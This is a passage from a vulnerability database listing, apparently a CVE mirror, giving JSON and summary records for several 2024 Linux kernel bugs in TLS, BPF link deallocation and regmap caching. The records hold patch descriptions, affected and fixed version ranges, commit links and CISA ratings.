            "url": "https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "dd32621f19243f89ce830919496a5dcc2158aa33",
              "status": "affected",
              "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221",
              "versionType": "git"
            },
            {
              "lessThan": "196f198ca6fce04ba6ce262f5a0e4d567d7d219d",
              "status": "affected",
              "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221",
              "versionType": "git"
            },
            {
              "lessThan": "6db22d6c7a6dc914b12c0469b94eb639b6a8a146",
              "status": "affected",
              "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221",
              "versionType": "git"
            },
            {
              "lessThan": "e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57",
              "status": "affected",
              "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221",
              "versionType": "git"
            },
            {
              "lessThan": "e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb",
              "status": "affected",
              "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.18",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.18",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.6",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix race between tx work scheduling and socket close\n\nSimilarly to previous commit, the submitting thread (recvmsg/sendmsg)\nmay exit as soon as the async crypto handler calls complete().\nReorder scheduling the work before calling complete().\nThis seems more logical in the first place, as it\u0027s\nthe inverse order of what the submitting thread will do."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:51:37.235Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/dd32621f19243f89ce830919496a5dcc2158aa33"
        },
        {
          "url": "https://git.kernel.org/stable/c/196f198ca6fce04ba6ce262f5a0e4d567d7d219d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146"
        },
        {
          "url": "https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57"
        },
        {
          "url": "https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb"
        }
      ],
      "title": "tls: fix race between tx work scheduling and socket close",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26585",
    "datePublished": "2024-02-21T14:59:13.088Z",
    "dateReserved": "2024-02-19T14:20:24.125Z",
    "dateUpdated": "2025-11-04T18:29:48.732Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35860 (GCVE-0-2024-35860)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

bpf: support deferring bpf_link dealloc to after RCU grace period

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: support deferring bpf_link dealloc to after RCU grace period BPF link for some program types is passed as a "context" which can be used by those BPF programs to look up additional information. E.g., for multi-kprobes and multi-uprobes, link is used to fetch BPF cookie values. Because of this runtime dependency, when bpf_link refcnt drops to zero there could still be active BPF programs running accessing link data. This patch adds generic support to defer bpf_link dealloc callback to after RCU GP, if requested. This is done by exposing two different deallocation callbacks, one synchronous and one deferred. If deferred one is provided, bpf_link_free() will schedule dealloc_deferred() callback to happen after RCU GP. BPF is using two flavors of RCU: "classic" non-sleepable one and RCU tasks trace one. The latter is used when sleepable BPF programs are used. bpf_link_free() accommodates that by checking underlying BPF program's sleepable flag, and goes either through normal RCU GP only for non-sleepable, or through RCU tasks trace GP *and* then normal RCU GP (taking into account rcu_trace_implies_rcu_gp() optimization), if BPF program is sleepable. We use this for multi-kprobe and multi-uprobe links, which dereference link during program run. We also preventively switch raw_tp link to use deferred dealloc callback, as upcoming changes in bpf-next tree expose raw_tp link data (specifically, cookie value) to BPF program at runtime as well.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/876941f533e7b47fc…
	https://git.kernel.org/stable/c/5d8d447777564b35f…
	https://git.kernel.org/stable/c/1a80dbcb2dbaf6e4c…

Impacted products

Vendor

Product

Version

Linux

Affected: 0dcac272540613d41c05e89679e4ddb978b612f1 , < 876941f533e7b47fc69977fc4551c02f2d18af97 (git)
Affected: 0dcac272540613d41c05e89679e4ddb978b612f1 , < 5d8d447777564b35f67000e7838e7ccb64d525c8 (git)
Affected: 0dcac272540613d41c05e89679e4ddb978b612f1 , < 1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce (git)

Linux

Affected: 5.18
Unaffected: 0 , < 5.18 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.532Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/876941f533e7b47fc69977fc4551c02f2d18af97"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5d8d447777564b35f67000e7838e7ccb64d525c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35860",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:41:33.868687Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:17.617Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/bpf.h",
            "kernel/bpf/syscall.c",
            "kernel/trace/bpf_trace.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "876941f533e7b47fc69977fc4551c02f2d18af97",
              "status": "affected",
              "version": "0dcac272540613d41c05e89679e4ddb978b612f1",
              "versionType": "git"
            },
            {
              "lessThan": "5d8d447777564b35f67000e7838e7ccb64d525c8",
              "status": "affected",
              "version": "0dcac272540613d41c05e89679e4ddb978b612f1",
              "versionType": "git"
            },
            {
              "lessThan": "1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce",
              "status": "affected",
              "version": "0dcac272540613d41c05e89679e4ddb978b612f1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/bpf.h",
            "kernel/bpf/syscall.c",
            "kernel/trace/bpf_trace.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.18"
            },
            {
              "lessThan": "5.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: support deferring bpf_link dealloc to after RCU grace period\n\nBPF link for some program types is passed as a \"context\" which can be\nused by those BPF programs to look up additional information. E.g., for\nmulti-kprobes and multi-uprobes, link is used to fetch BPF cookie values.\n\nBecause of this runtime dependency, when bpf_link refcnt drops to zero\nthere could still be active BPF programs running accessing link data.\n\nThis patch adds generic support to defer bpf_link dealloc callback to\nafter RCU GP, if requested. This is done by exposing two different\ndeallocation callbacks, one synchronous and one deferred. If deferred\none is provided, bpf_link_free() will schedule dealloc_deferred()\ncallback to happen after RCU GP.\n\nBPF is using two flavors of RCU: \"classic\" non-sleepable one and RCU\ntasks trace one. The latter is used when sleepable BPF programs are\nused. bpf_link_free() accommodates that by checking underlying BPF\nprogram\u0027s sleepable flag, and goes either through normal RCU GP only for\nnon-sleepable, or through RCU tasks trace GP *and* then normal RCU GP\n(taking into account rcu_trace_implies_rcu_gp() optimization), if BPF\nprogram is sleepable.\n\nWe use this for multi-kprobe and multi-uprobe links, which dereference\nlink during program run. We also preventively switch raw_tp link to use\ndeferred dealloc callback, as upcoming changes in bpf-next tree expose\nraw_tp link data (specifically, cookie value) to BPF program at runtime\nas well."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:03.105Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/876941f533e7b47fc69977fc4551c02f2d18af97"
        },
        {
          "url": "https://git.kernel.org/stable/c/5d8d447777564b35f67000e7838e7ccb64d525c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/1a80dbcb2dbaf6e4c216e62e30fa7d3daa8001ce"
        }
      ],
      "title": "bpf: support deferring bpf_link dealloc to after RCU grace period",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35860",
    "datePublished": "2024-05-19T08:34:19.368Z",
    "dateReserved": "2024-05-17T13:50:33.107Z",
    "dateUpdated": "2025-05-04T09:07:03.105Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36019 (GCVE-0-2024-36019)

Vulnerability from cvelistv5 – Published: 2024-05-30 14:59 – Updated: 2025-05-04 09:10

Title

regmap: maple: Fix cache corruption in regcache_maple_drop()

Summary

In the Linux kernel, the following vulnerability has been resolved: regmap: maple: Fix cache corruption in regcache_maple_drop() When keeping the upper end of a cache block entry, the entry[] array must be indexed by the offset from the base register of the block, i.e. max - mas.index. The code was indexing entry[] by only the register address, leading to an out-of-bounds access that copied some part of the kernel memory over the cache contents. This bug was not detected by the regmap KUnit test because it only tests with a block of registers starting at 0, so mas.index == 0.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3af6c5ac72dc5b721…
	https://git.kernel.org/stable/c/51c4440b9d3fd7c82…
	https://git.kernel.org/stable/c/00bb549d7d63a2153…

Impacted products

Vendor

Product

Version

Linux

Affected: f033c26de5a5734625d2dd1dc196745fae186f1b , < 3af6c5ac72dc5b721058132a0a1d7779e443175e (git)
Affected: f033c26de5a5734625d2dd1dc196745fae186f1b , < 51c4440b9d3fd7c8234e6de9170a487c03506e53 (git)
Affected: f033c26de5a5734625d2dd1dc196745fae186f1b , < 00bb549d7d63a21532e76e4a334d7807a54d9f31 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36019",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-30T16:11:04.952877Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:34.967Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.601Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3af6c5ac72dc5b721058132a0a1d7779e443175e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/51c4440b9d3fd7c8234e6de9170a487c03506e53"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/00bb549d7d63a21532e76e4a334d7807a54d9f31"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/base/regmap/regcache-maple.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3af6c5ac72dc5b721058132a0a1d7779e443175e",
              "status": "affected",
              "version": "f033c26de5a5734625d2dd1dc196745fae186f1b",
              "versionType": "git"
            },
            {
              "lessThan": "51c4440b9d3fd7c8234e6de9170a487c03506e53",
              "status": "affected",
              "version": "f033c26de5a5734625d2dd1dc196745fae186f1b",
              "versionType": "git"
            },
            {
              "lessThan": "00bb549d7d63a21532e76e4a334d7807a54d9f31",
              "status": "affected",
              "version": "f033c26de5a5734625d2dd1dc196745fae186f1b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/base/regmap/regcache-maple.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: maple: Fix cache corruption in regcache_maple_drop()\n\nWhen keeping the upper end of a cache block entry, the entry[] array\nmust be indexed by the offset from the base register of the block,\ni.e. max - mas.index.\n\nThe code was indexing entry[] by only the register address, leading\nto an out-of-bounds access that copied some part of the kernel\nmemory over the cache contents.\n\nThis bug was not detected by the regmap KUnit test because it only\ntests with a block of registers starting at 0, so mas.index == 0."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:42.264Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3af6c5ac72dc5b721058132a0a1d7779e443175e"
        },
        {
          "url": "https://git.kernel.org/stable/c/51c4440b9d3fd7c8234e6de9170a487c03506e53"
        },
        {
          "url": "https://git.kernel.org/stable/c/00bb549d7d63a21532e76e4a334d7807a54d9f31"
        }
      ],
      "title": "regmap: maple: Fix cache corruption in regcache_maple_drop()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36019",
    "datePublished": "2024-05-30T14:59:42.840Z",
    "dateReserved": "2024-05-17T13:50:33.157Z",
    "dateUpdated": "2025-05-04T09:10:42.264Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26584 (GCVE-0-2024-26584)

Vulnerability from cvelistv5 – Published: 2024-02-21 14:59 – Updated: 2025-11-04 18:29

Title

net: tls: handle backlogging of crypto requests

Summary

In the Linux kernel, the following vulnerability has been resolved: net: tls: handle backlogging of crypto requests Since we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our requests to the crypto API, crypto_aead_{encrypt,decrypt} can return -EBUSY instead of -EINPROGRESS in valid situations. For example, when the cryptd queue for AESNI is full (easy to trigger with an artificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued to the backlog but still processed. In that case, the async callback will also be called twice: first with err == -EINPROGRESS, which it seems we can just ignore, then with err == 0. Compared to Sabrina's original patch this version uses the new tls_*crypt_async_wait() helpers and converts the EBUSY to EINPROGRESS to avoid having to modify all the error handling paths. The handling is identical.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3ade391adc584f17b…
	https://git.kernel.org/stable/c/cd1bbca03f3c1d845…
	https://git.kernel.org/stable/c/13eca403876bbea37…
	https://git.kernel.org/stable/c/ab6397f072e5097f2…
	https://git.kernel.org/stable/c/85905414731887410…

Impacted products

Vendor

Product

Version

Linux

Affected: a54667f6728c2714a400f3c884727da74b6d1717 , < 3ade391adc584f17b5570fd205de3ad029090368 (git)
Affected: a54667f6728c2714a400f3c884727da74b6d1717 , < cd1bbca03f3c1d845ce274c0d0a66de8e5929f72 (git)
Affected: a54667f6728c2714a400f3c884727da74b6d1717 , < 13eca403876bbea3716e82cdfe6f1e6febb38754 (git)
Affected: a54667f6728c2714a400f3c884727da74b6d1717 , < ab6397f072e5097f267abf5cb08a8004e6b17694 (git)
Affected: a54667f6728c2714a400f3c884727da74b6d1717 , < 8590541473188741055d27b955db0777569438e3 (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 5.15.160 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.18 , ≤ 6.6.* (semver)
Unaffected: 6.7.6 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26584",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-26T17:14:36.035758Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:03.401Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:47.526Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3ade391adc584f17b5570fd205de3ad029090368",
              "status": "affected",
              "version": "a54667f6728c2714a400f3c884727da74b6d1717",
              "versionType": "git"
            },
            {
              "lessThan": "cd1bbca03f3c1d845ce274c0d0a66de8e5929f72",
              "status": "affected",
              "version": "a54667f6728c2714a400f3c884727da74b6d1717",
              "versionType": "git"
            },
            {
              "lessThan": "13eca403876bbea3716e82cdfe6f1e6febb38754",
              "status": "affected",
              "version": "a54667f6728c2714a400f3c884727da74b6d1717",
              "versionType": "git"
            },
            {
              "lessThan": "ab6397f072e5097f267abf5cb08a8004e6b17694",
              "status": "affected",
              "version": "a54667f6728c2714a400f3c884727da74b6d1717",
              "versionType": "git"
            },
            {
              "lessThan": "8590541473188741055d27b955db0777569438e3",
              "status": "affected",
              "version": "a54667f6728c2714a400f3c884727da74b6d1717",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.160",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.18",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.160",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.18",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.6",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: tls: handle backlogging of crypto requests\n\nSince we\u0027re setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our\nrequests to the crypto API, crypto_aead_{encrypt,decrypt} can return\n -EBUSY instead of -EINPROGRESS in valid situations. For example, when\nthe cryptd queue for AESNI is full (easy to trigger with an\nartificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued\nto the backlog but still processed. In that case, the async callback\nwill also be called twice: first with err == -EINPROGRESS, which it\nseems we can just ignore, then with err == 0.\n\nCompared to Sabrina\u0027s original patch this version uses the new\ntls_*crypt_async_wait() helpers and converts the EBUSY to\nEINPROGRESS to avoid having to modify all the error handling\npaths. The handling is identical."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:51:35.535Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72"
        },
        {
          "url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694"
        },
        {
          "url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3"
        }
      ],
      "title": "net: tls: handle backlogging of crypto requests",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26584",
    "datePublished": "2024-02-21T14:59:12.452Z",
    "dateReserved": "2024-02-19T14:20:24.125Z",
    "dateUpdated": "2025-11-04T18:29:47.526Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
